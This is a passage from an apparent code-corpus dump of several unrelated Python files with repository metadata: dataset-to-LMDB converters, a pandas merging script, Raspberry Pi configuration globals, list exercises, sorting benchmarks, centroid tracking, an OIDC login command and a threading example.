data/Head\n# --brainwash_10_27_2014_images\n# --brainwash_11_13_2014_images\n# --brainwash_11_24_2014_images\n# --brainwash_train.idl\n# --brainwash_val.idl\n# --brainwash_test.idl\ndef idl2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir) \n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n anno_file=data_dir+\"/brainwash_\"+args.split+\".idl\"\n with open(anno_file) as f:\n lines = f.readlines()\n for line in tqdm(lines):\n items = line[:-1].split(\":\")\n if len(items)==2:\n imgpath = items[0][1:-1]\n imgname = imgpath.split(\"/\")[-1]\n img = cv2.imread(data_dir+\"/\"+imgpath)\n if img is None:\n print(imgpath+\" cannot read\")\n continue\n items = items[1][1:-1].replace(\",\",\"\")\n items = items.replace(\"(\",\"\")\n items = items.replace(\")\",\"\")\n items = items.split(\" \")\n items = [int(float(b)) for b in items]\n bboxes = []\n for i in range(int(len(items)/4)):\n x = items[4*i]\n y = items[4*i+1]\n x2 = items[4*i+2]\n y2 = items[4*i+3]\n bboxes.append([x,y,x2,y2,0])\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n 
txn.put(imgname.encode(),annotated_datum.SerializeToString())\n\n#for coco with json annotation dataset\ndef convertjson(txn,json_path):\n with open(json_path) as f:\n samples = json.load(f)\n images_dir = os.path.dirname(json_path)+\"/../images\"\n for sample in tqdm(samples):\n imagename = sample[\"file_name\"]\n imgpath = images_dir+\"/\"+imagename\n img = cv2.imread(imgpath)\n if img is None: # check before touching img.shape, otherwise a missing image crashes here\n print(imagename + \" not found\")\n continue\n h,w,_ = img.shape\n bboxes = []\n objs = sample[\"object\"]\n for obj in objs:\n bbox = obj['bbox']\n bbox[0] = bbox[0]\n bbox[1] = bbox[1]\n bbox[2] = bbox[0]+bbox[2]\n bbox[3] = bbox[1]+bbox[3]\n bbox.append(0)\n bboxes.append(bbox)\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(imagename.encode(),annotated_datum.SerializeToString())\ndef coco2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n json_path = \"data/\"+args.dataset+\"/annotations/instances_\"+args.split+\".json\"\n convertjson(txn,json_path)\n\ndef freihand2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n anno_file=data_dir+\"/annotations/freihand_\"+args.split+\".json\"\n with open(anno_file) as f:\n data = json.load(f)\n for anno in tqdm(data['annotations']):\n filename = \"{:08d}\".format(anno['image_id'])+\".jpg\"\n img = cv2.imread(data_dir+\"/training/rgb/\"+filename)\n if img is None:\n print(filename+\" not found\")\n continue\n bboxes = []\n bbox = anno['bbox']\n bbox[2] += bbox[0]\n bbox[3] += bbox[1]\n bbox.append(0)\n bboxes.append(bbox)\n annotated_datum = anno2datum(img, bboxes)\n txn.put(filename.encode(),annotated_datum.SerializeToString())\n#for bdd100k\n# data/Car\n# --images\n# --labels\n# --train.txt\n# --val.txt\n# each line contain imgpath like 100k/train/61c0de9c-996cae66.jpg\ndef bdd2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n valfile = data_dir+\"/\"+args.split+\".txt\"\n with open(valfile) as f:\n lines = f.readlines()\n for line in tqdm(lines):\n imgpath = data_dir+\"/images/\"+line.strip()\n img = cv2.imread(imgpath)\n annopath = data_dir+\"/labels/\"+line[:-4]+\"json\"\n with open(annopath) as fanno:\n data = json.load(fanno)\n objs = data['frames'][0]['objects']\n bboxes = []\n for obj in objs:\n label = obj['category']\n if 'box2d' in obj and label == \"car\": \n bbox = obj['box2d']\n x1 = float(bbox['x1'])\n y1 = float(bbox['y1'])\n x2 = float(bbox['x2'])\n y2 = float(bbox['y2'])\n bboxes.append([x1,y1,x2,y2,0]) \n if len(bboxes) == 0:\n print(imgpath + \" has no valid size \")\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(imgpath.encode(),annotated_datum.SerializeToString()) \n#for widerface\n# data/Face\n# --WIDER_train\n# --WIDER_val\n# --wider_face_split\n# --wider_face_train_bbx_gt.txt\n# 
--wider_face_val_bbx_gt.txt\ndef wider2lmdb(args, min_size = 30):\n import sys\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n db = lmdb.open(lmdb_dir, map_size=1e10)\n with db.begin(write=True) as txn:\n annopath = data_dir+\"/wider_face_split/wider_face_\"+args.split+\"_bbx_gt.txt\"\n imgdir = data_dir+\"/WIDER_\"+args.split+\"/images\"\n with open(annopath) as f:\n while(True):\n imgpath = f.readline()[:-1]\n sys.stdout.write(\"\\r\"+imgpath)\n if imgpath == \"\":\n break\n img = cv2.imread(imgdir+\"/\"+imgpath)\n numbbox=int(f.readline())\n bboxes = []\n for _ in range(numbbox):\n line = f.readline()\n line = line.split()\n line = [int(l) for l in line]\n size = max(line[2],line[3])\n bbox = line[:4]\n bbox[2] += bbox[0]\n bbox[3] += bbox[1]\n bbox.append(0)\n if size <= min_size:\n continue\n bboxes.append(bbox)\n if len(bboxes) == 0:\n print(imgpath + \" has no valid size \")\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(imgpath.encode(),annotated_datum.SerializeToString())\n\ndef mask2lmdb(args, min_size = 20):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n dir = data_dir+'/'+args.split\n files = os.listdir(dir)\n files = [ f for f in files if f.endswith('.xml')]\n if args.split.find(\"train\") != -1: # shuffle only the training split; find() returns -1 when absent\n random.shuffle(files) # shuffles in place; random.shuffle returns None\n cat2label = {cat: i for i, cat in enumerate(CLASSES[args.dataset])}\n for file in tqdm(files):\n xml_path = dir+'/'+file\n tree = ET.parse(xml_path)\n root = tree.getroot()\n filename = file.replace('xml','jpg')\n imgpath = dir+'/'+filename\n img = cv2.imread(imgpath)\n if img is None:\n print(\"cannot read \"+imgpath)\n continue\n bboxes = []\n for obj in root.findall('object'):\n name = obj.find('name').text\n if name not in CLASSES[args.dataset]:\n print(imgpath+\" has no expect label \"+name)\n continue\n label = cat2label[name]\n bbox = obj.find('bndbox')\n x = float(bbox.find('xmin').text)\n y = float(bbox.find('ymin').text)\n x2 = float(bbox.find('xmax').text)\n y2 = float(bbox.find('ymax').text)\n bbox = [x,y,x2,y2,label]\n bboxes.append(bbox)\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(filename.encode(),annotated_datum.SerializeToString())\n\ndef lmdb2image(args, show=False, gen_anchors=True,normalized=True):\n data_dir =\"data/\"+args.dataset\n lmdb_dir = data_dir+\"/lmdb/\"+args.split+\"_lmdb\"\n if not os.path.exists(lmdb_dir):\n print(lmdb_dir+\" not exists\")\n return\n db = lmdb.open(lmdb_dir)\n txn = db.begin()\n cursor = txn.cursor()\n annotated_datum = caffe_pb2.AnnotatedDatum()\n if gen_anchors:\n data = []\n labels = CLASSES[args.dataset]\n statics = len(labels)*[0]\n index = 0\n num_images = txn.stat()['entries']\n pbar = tqdm(range(num_images))\n for key, value in cursor:\n pbar.set_description(\"{}/{}\".format(index,num_images))\n pbar.update(1)\n index += 1\n annotated_datum.ParseFromString(value)\n groups = annotated_datum.annotation_group\n #print(len(groups))\n if show or not normalized:\n datum = annotated_datum.datum\n img = np.fromstring(datum.data,dtype=np.uint8)\n img = cv2.imdecode(img,-1) \n height, width, _ = 
img.shape\n for group in groups:\n for annotation in group.annotation:\n bbox = annotation.bbox\n if bbox.xmax-bbox.xmin<=0 or bbox.ymax-bbox.ymin<=0:\n continue\n labelindex = group.group_label-1\n label = labels[labelindex]+\"_\"+str(annotation.instance_id)\n statics[labelindex] += 1\n if show or not normalized:\n x1 = int(bbox.xmin*width)\n y1 = int(bbox.ymin*height)\n x2 = int(bbox.xmax*width)\n y2 = int(bbox.ymax*height)\n cv2.rectangle(img,(x1,y1),(x2,y2),(255,0,0))\n cv2.putText(img,label,(x1,y1),3,1,(0,0,255))\n if gen_anchors:\n if normalized:\n data.append([bbox.xmax-bbox.xmin,bbox.ymax-bbox.ymin])\n else:\n data.append([x2-x1,y2-y1])\n if args.savegt:\n filename=key.decode().replace(\"/\",\"_\")\n cv2.imwrite(\"output/gt/\"+filename,img)\n if show:\n cv2.putText(img,key.decode(),(0,20),3,1,(0,0,255))\n cv2.imshow(\"img\",img)\n cv2.waitKey()\n total = 0\n for i,st in enumerate(statics):\n total += st\n print(labels[i]+\": \"+str(st))\n print(\"-------Total: \"+str(total))\n if gen_anchors:\n from get_anchors import get_anchors\n get_anchors(data)\n\nfuncs = Registry()\nfuncs.register_module(\"voc\",xml2lmdb)\nfuncs.register_module(\"fddb\",xml2lmdb)\nfuncs.register_module(\"wider\",wider2lmdb)\nfuncs.register_module(\"Face\",xml2lmdb)\nfuncs.register_module(\"Mask\",mask2lmdb)\nfuncs.register_module(\"Person\",xml2lmdb)\nfuncs.register_module(\"Head\",idl2lmdb)\nfuncs.register_module(\"Hand\",freihand2lmdb)\nfuncs.register_module(\"Car\",bdd2lmdb)\nfuncs.register_module(\"tower\",txt2lmdb)\nfuncs.register_module(\"insect\",paddle2lmdb)\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset', default=\"Mask\")\n parser.add_argument('--split', default=\"val\")\n parser.add_argument('--savegt', default=False)\n return parser.parse_args()\n\nif __name__==\"__main__\":\n args = get_args()\n func = funcs.get(args.dataset)\n func(args)\n lmdb2image(args)","repo_name":"imistyrain/ssd-models","sub_path":"python/convert2lmdb.py","file_name":"convert2lmdb.py","file_ext":"py","file_size_in_byte":22498,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"21"} +{"seq_id":"71698703093","text":"import pandas as pd\nimport numpy as np\nimport argparse\n\nimport glob\n\nparser = argparse.ArgumentParser(description=\"Process some data file\")\nparser.add_argument('--fp', type=str, help='Data to be processed')\nparser.add_argument('--sfp', type=str, help='Data to be processed')\nargs = parser.parse_args()\n\nFile_path = args.fp\nStatus_file_path = args.sfp\nall_data = pd.DataFrame()\n\ndef data_comb(File_path,Status_file_path):\n all_data = pd.DataFrame() # build the frame locally; reassigning the module-level name here would raise UnboundLocalError\n for f in glob.glob(File_path):\n df = pd.read_excel(f)\n all_data = all_data.append(df,ignore_index=True)\n \n all_data['date'] = pd.to_datetime(all_data['date'])\n\n status = pd.read_excel(Status_file_path)\n\n all_data_st = pd.merge(all_data, status, how='left')\n\n all_data_st['status'].fillna('bronze',inplace=True)\n\n all_data_st[\"status\"] = all_data_st[\"status\"].astype(\"category\")\n all_data_st.dtypes\n\n all_data_st.groupby([\"status\"])[[\"quantity\",\"unit price\",\"ext price\"]].mean()\n\n all_data_st.groupby([\"status\"])[[\"quantity\",\"unit price\",\"ext price\"]].agg([np.sum,np.mean, np.std])\n\n all_data_st.drop_duplicates(subset=[\"account number\",\"name\"]).iloc[:,[0,1,7]].groupby([\"status\"])[\"name\"].count()\n\n print(all_data_st)\n\nif File_path != None and Status_file_path != None:\n
data_comb(File_path,Status_file_path)","repo_name":"shubhamchoubey80/Python-Practice-Problems","sub_path":"Data Combining/comb_file.py","file_name":"comb_file.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4982353923","text":"import time\n\ndef init():\n timestr = time.strftime(\"%Y%m\")\n\n # *** Explorer -> Projector\n # *** Collector -> Camera\n\n # Transfer\n # --------------------------------------------------------------------------\n\n # IP Addresses\n # TODO: change for deployment - determine static IP addrs for the camera and the projector\n global IP_ADDR_PROJECTOR\n # IP_ADDR_PROJECTOR = '192.168.0.127'\n # IP_ADDR_PROJECTOR = '192.168.123.193'\n # IP_ADDR_PROJECTOR = '192.168.1.193'\n IP_ADDR_PROJECTOR = '192.168.0.179'\n\n global IP_ADDR_CAMERA\n # IP_ADDR_CAMERA = '192.168.0.149'\n # IP_ADDR_CAMERA = '192.168.123.100'\n # IP_ADDR_CAMERA = '192.168.1.100'\n IP_ADDR_CAMERA = '192.168.0.110'\n\n # Databases\n # TODO: change for deployment\n global DBNAME_MASTER\n DBNAME_MASTER = \"capra_projector_test_179.db\"\n\n global DBNAME_MASTER_BAK\n DBNAME_MASTER_BAK = \"capra_projector_test_179_\" + timestr + \"_bak.db\"\n\n global DBNAME_INIT\n DBNAME_INIT = \"capra_projector_init.db\"\n\n global DBNAME_CAMERA\n DBNAME_CAMERA = \"capra_camera.db\"\n global DBNAME_CAMERA_BAK\n DBNAME_CAMERA_BAK = \"capra_camera_\" + timestr + \"_bak.db\"\n\n # Paths\n global DATAPATH_CAMERA\n DATAPATH_CAMERA = '/home/pi/capra-storage/'\n\n global DATAPATH_PROJECTOR\n DATAPATH_PROJECTOR = '/media/pi/capra-hd/'\n # DATAPATH_PROJECTOR = '/media/pi/capra-hd3/jordan/'\n\n global CAPRAPATH_PROJECTOR\n CAPRAPATH_PROJECTOR = '/home/pi/capra/'\n\n global PATH_CAMERA_DB\n PATH_CAMERA_DB = DATAPATH_CAMERA + DBNAME_CAMERA\n\n global PATH_PROJECTOR_DB\n PATH_PROJECTOR_DB = DATAPATH_PROJECTOR + DBNAME_MASTER\n\n\n # Regex for picture names\n global FILENAME\n global FILENAME_ROTATED\n FILENAME = \"[!\\.]*_cam[1-3].jpg\"\n FILENAME_ROTATED = \"[!\\.]*_cam2r.jpg\"\n\n # Hall Effect sensor statuses\n global HALL_EFFECT\n global PREV_HALL_VALUE\n HALL_EFFECT = None\n PREV_HALL_VALUE = False\n global HALL_BOUNCE_LIMIT\n global HALL_BOUNCE_TIMER\n HALL_BOUNCE_LIMIT = 3000 # in milliseconds\n HALL_BOUNCE_TIMER = None\n\n # Is camera connected to WiFi? 
\n global CAMERA_UP\n CAMERA_UP = None\n\n # Flags\n global flag_start_transfer\n flag_start_transfer = False\n\n global flag_run_explorer\n flag_run_explorer = False\n\n # Color detection\n global COLOR_CLUSTER\n COLOR_CLUSTER = 5\n\n global COLOR_DIMX\n COLOR_DIMX = 160\n\n global COLOR_DIMY\n COLOR_DIMY = 95\n\n # Projector\n # --------------------------------------------------------------------------\n\n # Projector Pins\n global PROJ_UART\n PROJ_UART = 14 # BOARD - 8 (used to be RGB1_BLUE)\n\n global HALL_EFFECT_PIN\n HALL_EFFECT_PIN = 26 # BOARD - 37\n global BUTT_MODE\n BUTT_MODE = 20 # BOARD - 38\n global BUTT_PLAY_PAUSE\n BUTT_PLAY_PAUSE = 5 # BOARD - 29\n global BUTT_PREV # Eagle says this is NEXT\n BUTT_PREV = 6 # BOARD - 31\n global BUTT_NEXT # Eagle says this is PREV\n BUTT_NEXT = 13 # BOARD - 33\n global BUTT_OFF\n BUTT_OFF = 4 # BOARD - 7\n global BUTT_ON\n BUTT_ON = 3 # BOARD - 5\n\n global ACCEL\n ACCEL = 0x1d # Accelerometer - change to 0x1e if you have soldered the address jumper\n global ACCEL_SCL\n ACCEL_SCL = 3 # BOARD - 5\n global ACCEL_SDA\n ACCEL_SDA = 2 # BOARD - 3\n\n global BUTT_ENC1\n BUTT_ENC1 = 25 # BOARD - 22\n global ENC1_A\n ENC1_A = 23 # BOARD - 16\n global ENC1_B\n ENC1_B = 24 # BOARD - 18\n\n global NEO1\n NEO1 = 18 # BOARD - 12\n\n global WHITE_LED1\n WHITE_LED1 = 19 # BOARD - 35\n global WHITE_LED2\n WHITE_LED2 = 16 # BOARD - 36\n global WHITE_LED3\n WHITE_LED3 = 21 # BOARD - 40\n\n global RGB1_RED\n RGB1_RED = 15 # BOARD - 10\n global RGB1_GREEN\n RGB1_GREEN = 17 # BOARD - 11\n\n global RGB2_RED\n RGB2_RED = 7 # BOARD - 26\n global RGB2_GREEN\n RGB2_GREEN = 8 # BOARD - 24\n global RGB2_BLUE\n RGB2_BLUE = 11 # BOARD - 23\n\n # Camera\n # --------------------------------------------------------------------------\n\n # Camera Storage\n global DB\n DB = '/home/pi/capra-storage/capra_camera.db'\n\n global DIRECTORY\n DIRECTORY = '/home/pi/capra-storage/'\n\n # Camera Pins\n global BUTTON_PLAYPAUSE\n BUTTON_PLAYPAUSE = 17 # BOARD - 11\n global BUTTON_OFF\n BUTTON_OFF = 25 # BOARD - 22\n global SEL_1\n SEL_1 = 22 # BOARD - 15\n global SEL_2\n SEL_2 = 23 # BOARD - 16\n global LED_RED\n LED_RED = 13 # BOARD - 33\n global LED_GREEN\n LED_GREEN = 26 # BOARD - 37\n global LED_BLUE\n LED_BLUE = 14 # BOARD - 8\n global PIEZO\n PIEZO = 12 # BOARD - 32\n global LDO\n LDO = 6 # BOARD - 31\n\n # Camera Settings\n global SEALEVEL_PRESSURE\n SEALEVEL_PRESSURE = 101500\n global CAM_RESOLUTION\n CAM_RESOLUTION = (1280, 720)\n global NEW_HIKE_TIME\n # NEW_HIKE_TIME = 10800 # 3 hours\n # NEW_HIKE_TIME = 9000 # 2.5 hours\n NEW_HIKE_TIME = 3600 # 1 hour\n global CAM_INTERVAL\n CAM_INTERVAL = 5 # 5 seconds\n","repo_name":"EverydayDesignStudio/capra","sub_path":"globals.py","file_name":"globals.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"27119222036","text":"#a) Создайте два списка в диапазоне (0, 100) с шагом 10. Присвойте некоторым переменным значения этих списков.\n#b) Извлеките из первого списка второй элемент.\n#c) Измените во втором списке последний объект на число «200». Выведите список на экран.\n#d) Соедините оба списка в один, присвоив результат новой переменной.\n#Выведите получившийся список на экран.\n#e) Возьмите срез из соединённого списка так, чтобы туда попали некоторые части обоих первых списков. Срез свяжите с очередной новой переменной. 
Выведите значение этой переменной.\n#f) Добавьте в список-срез два новых элемента и снова выведите его.\n#g) С помощью функций min() и max() найдите и выведите элементы объединенного списка с максимальным и минимальным значением\nimport random\n\ndef task_a(size):\n list_new = []\n for i in range(size):\n t = random.randint(0, 100)\n list_new.append(t)\n return list_new\n\n\ndef task_b(list_task):\n list_task.pop(1)\n return list_task\n\n\ndef task_c(list_task):\n list_task.pop()\n list_task.append(200)\n return list_task\n\n\ndef task_d(list_task_1, list_task_2):\n list_combined = list_task_1 + list_task_2\n return list_combined\n\n\ndef task_e(list_combined):\n list_cutted = []\n i = 20\n while i < 40:\n list_cutted.append(list_combined[i])\n i += 1\n return list_cutted\n\n\ndef task_f(list_cutted):\n list_cutted.append(10)\n list_cutted.append(30)\n return list_cutted\n\n\ndef main():\n\n #Пункт a)\n list_1 = task_a(30)\n list_2 = task_a(25)\n print(\"Созданные списки:\")\n print(list_1)\n print(list_2)\n print()\n\n #Пункт b)\n list1 = task_b(list_1)\n\n #Пункт c)\n list_2 = task_c(list_2)\n print(\"Видоизменённые списки:\")\n print(list_1)\n print(list_2)\n print()\n\n #Пункт d)\n list_combined = task_d(list_1, list_2)\n print(\"Список после объединения:\")\n print(list_combined)\n print()\n\n #Пункт e)\n list_cutted = task_e(list_combined)\n print(\"Обрезанный список:\")\n print(list_cutted)\n print()\n\n #Пункт f)\n list_cutted = task_f(list_cutted)\n print(\"Обрезанный список после добавления элементов:\")\n print(list_cutted)\n print()\n\n #Пункт g)\n print(f\"Минимальный элемент в списке со срезом: {min(list_cutted)}\")\n print(f\"Максимальный элемент в списке со срезом: {max(list_cutted)}\")\n\n return 0\n\n\nif __name__ == '__main__':\n main()","repo_name":"BlockHead007/pythontasks","sub_path":"Лабораторная 2/Task 2.py","file_name":"Task 2.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41217167535","text":"from bisect import bisect_left\nfrom time import time\n\n\ndef insertion_sort_time(vetor):\n for i in range(1, len(vetor)):\n chave = vetor[i]\n j = bisect_left(vetor, chave, 0, i)\n vetor[j+1:i+1] = vetor[j:i]\n vetor[j] = chave\n return vetor\n\n\ndef bubble_sort_time(vetor):\n n = len(vetor)\n troca = True\n while troca:\n troca = False\n for i in range(n-1):\n if vetor[i] > vetor[i+1]:\n vetor[i], vetor[i+1] = vetor[i+1], vetor[i]\n troca = True\n n -= 1\n return vetor\n\n\ndef bubble_sort_comparacoes(vetor):\n comparacoes, trocas = 0, 0\n n = len(vetor)\n troca = True\n while troca:\n troca = False\n for i in range(n-1):\n comparacoes += 1\n if vetor[i] > vetor[i+1]:\n \n vetor[i], vetor[i+1] = vetor[i+1], vetor[i]\n trocas += 2\n \n troca = True\n n -= 1\n return comparacoes, trocas\n\n\ndef insertion_sort_comparasoes(vetor):\n comparacoes, trocas = 0, 0\n for i in range(1, len(vetor)):\n chave = vetor[i]\n\n j, c = bisect_left2(vetor, chave, 0, i)\n comparacoes += c\n\n trocas += 1\n vetor[j+1:i+1] = vetor[j:i]\n\n trocas += 1\n vetor[j] = chave\n\n return comparacoes, trocas\n\n\ndef bisect_left2(a, x, lo=0, hi=None):\n \"\"\"Return the index where to insert item x in list a, assuming a is sorted.\n\n The return value i is such that all e in a[:i] have e < x, and all e in\n a[i:] have e >= x. 
So if x already appears in the list, a.insert(i, x) will\n insert just before the leftmost x already there.\n\n Optional args lo (default 0) and hi (default len(a)) bound the\n slice of a to be searched.\n \"\"\"\n comparacoes = 0\n\n\n comparacoes += 1\n if lo < 0:\n raise ValueError('lo must be non-negative')\n comparacoes += 1\n\n if hi is None:\n hi = len(a)\n\n while lo < hi:\n mid = (lo + hi) // 2\n comparacoes += 1\n if a[mid] < x:\n lo = mid + 1\n else:\n hi = mid\n\n return lo, comparacoes\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()","repo_name":"djudju12/aulas","sub_path":"fabrica-software/algoritmos-performance/algortimosItem4.py","file_name":"algortimosItem4.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4509182835","text":"from scipy.spatial import distance as dist\nfrom collections import OrderedDict\nimport numpy as np\n\n## Centroid tracking algorithm adapted from:\n## https://www.pyimagesearch.com/2018/07/23/simple-object-tracking-with-opencv/\n\nclass Person():\n def __init__(self, centroid, bbox):\n self.bbox = bbox\n self.centroid = centroid\n\nclass Centroid_Tracking():\n def __init__(self):\n self.next_person = 0\n self.people = OrderedDict()\n self.disappeared = OrderedDict()\n\n def get_centroids(self, bbox):\n x_c = (bbox[0] + bbox[2]) / 2\n y_c = (bbox[1] + bbox[3]) / 2\n return [x_c, y_c]\n\n def new_person(self, centroid, bbox):\n person_id = self.next_person\n\n self.people[person_id] = Person(centroid, bbox)\n self.disappeared[person_id] = 0\n \n self.next_person += 1\n\n def tracking_update(self, new_bboxes): \n new_centroids = [self.get_centroids(bbox) for bbox in new_bboxes]\n\n if len(self.people) == 0:\n for i in range(len(new_centroids)):\n self.new_person(new_centroids[i], new_bboxes[i])\n else:\n used_rows = set()\n used_cols = set()\n\n people_ids = list(self.people.keys())\n cur_centroids = [list(self.people.values())[i].centroid for i in range(len(people_ids))]\n distances = dist.cdist(np.array(cur_centroids), np.array(new_centroids))\n\n rows = distances.min(axis=1).argsort()\n cols = distances.argmin(axis=1)[rows]\n \n for (row, col) in zip(rows, cols):\n if row in used_rows or col in used_cols:\n continue\n person_id = people_ids[row]\n self.people[person_id] = Person(new_centroids[col], new_bboxes[col])\n self.disappeared[person_id] = 0\n\n used_rows.add(row)\n used_cols.add(col)\n\n unused_row = set(range(0, distances.shape[0])).difference(used_rows)\n unused_col = set(range(0, distances.shape[1])).difference(used_cols)\n\n if distances.shape[0] >= distances.shape[1]:\n for row in unused_row:\n person_id = people_ids[row]\n self.disappeared[person_id] += 1\n\n else:\n for col in unused_col:\n self.new_person(new_centroids[col], new_bboxes[col])\n \n def tracking_frame(self, new_bboxes):\n if len(new_bboxes) == 0:\n for person_id in list(self.disappeared.keys()):\n self.disappeared[person_id] += 1\n return []\n else:\n # calculate new centroids\n self.tracking_update(new_bboxes)\n people_ids = list(self.people.keys())\n ret_bboxes = []\n for person_id in people_ids:\n if self.disappeared[person_id] == 0:\n bbox = self.people[person_id].bbox\n bbox.append(person_id)\n ret_bboxes.append(bbox)\n\n return 
ret_bboxes","repo_name":"brandon-l-ut/social_distancing_violation_detector","sub_path":"distance/centroid_tracking.py","file_name":"centroid_tracking.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26983436041","text":"import webbrowser\nfrom urllib import parse as urlparse\nfrom multiprocessing import Process, Queue\nimport json\nimport requests\nimport logging\nfrom logging.config import dictConfig\nimport random\nfrom .. import config, database\nfrom . import _callback\n\nLOGGER = logging.Logger(__name__)\n\nCHARACTERS ='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz'\n\n\ndef main(namespace, _):\n credentials = database.Credentials()\n id_token = credentials.get_token(namespace.provider_alias)\n if id_token:\n return id_token\n\n provider = config.provider(namespace.provider_alias)\n auth_request_uri, state = craft_request_uri(provider)\n queue = Queue()\n p = Process(target=_callback_server, args=(provider, state, queue))\n p.start()\n webbrowser.open(auth_request_uri)\n while input():\n pass\n p.terminate()\n code = queue.get()\n id_token = get_id_token(provider, code)\n credentials.save_token(namespace.provider_alias, id_token)\n\n\ndef craft_request_uri(provider):\n endpoint = provider.authorization_endpoint\n random_state = ''.join([random.choice(CHARACTERS) for i in range(16)])\n query = urlparse.urlencode({\n 'response_type': 'code',\n 'client_id': provider.client_id,\n 'redirect_uri': 'http://localhost:9527/code',\n 'state': random_state,\n 'scope': 'openid',\n })\n return f'{endpoint}?{query}', random_state\n\n\ndef _callback_server(provider, state, queue):\n dictConfig({\n 'version': 1,\n 'formatters': {'default': {\n 'format': '',\n }},\n 'handlers': {'wsgi': {\n 'class': 'logging.StreamHandler',\n 'stream': _callback.devnull,\n 'formatter': 'default'\n }},\n 'root': {\n 'level': 'INFO',\n 'handlers': ['wsgi']\n },\n })\n _callback.state = state\n _callback.token_endpoint = provider.token_endpoint\n _callback.queue = queue\n _callback.app.run(port=9527)\n\n\ndef get_id_token(provider, code):\n query = {\n 'grant_type': 'authorization_code',\n 'client_id': provider.client_id,\n 'client_secret': provider.client_secret,\n 'code': code,\n 'redirect_uri': 'http://localhost:9527/code',\n }\n response = requests.post(provider.token_endpoint, data=query)\n return json.loads(response.text)['id_token']\n","repo_name":"aisamji/oidc-auth","sub_path":"oidc_auth/commands/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38259321727","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 3 11:17:51 2019\r\n\r\n@author: Tanvir.Duggal\r\n\"\"\"\r\n\r\nimport threading\r\nimport time\r\nimport random\r\n\r\nitems = []\r\nevent = threading.Event()\r\n\r\nclass consumer(threading.Thread):\r\n def __init__(self, items, event):\r\n threading.Thread.__init__(self)\r\n self.items = items\r\n self.event = event\r\n \r\n def run(self):\r\n while True:\r\n time.sleep(2)\r\n self.event.wait()\r\n item = self.items.pop()\r\n print(\"Consumer consumed \" + str(item) + \" , popped from list \" + self.name)\r\n \r\nclass producer(threading.Thread):\r\n def __init__(self, integers, event):\r\n threading.Thread.__init__(self)\r\n self.items = items\r\n self.event = event\r\n \r\n def run(self):\r\n global item\r\n for i in range(10):\r\n 
